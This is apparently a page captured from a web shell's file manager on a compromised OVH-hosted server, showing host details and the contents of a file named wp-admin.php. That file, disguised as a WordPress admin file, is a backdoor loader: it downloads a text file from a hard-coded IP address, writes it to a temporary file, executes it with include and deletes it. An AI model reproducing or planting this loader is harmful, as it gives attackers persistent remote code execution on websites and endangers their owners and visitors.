HEX
Server: Apache
System: Linux webd003.cluster128.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: slyfwmm (169339)
PHP: 8.1.34
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/slyfwmm/laretediclo/wp-admin.php
<?php
$f = @tempnam(@sys_get_temp_dir(),"");
$handle = curl_init();
curl_setopt ($handle, CURLOPT_URL, 'http://69.30.227.202/file/0303.txt');
curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec( $handle );
if ( PHP_VERSION_ID < 80000 ) {
    curl_close(  $handle  );
}
@file_put_contents($f, $result);
@include $f;
@unlink($f);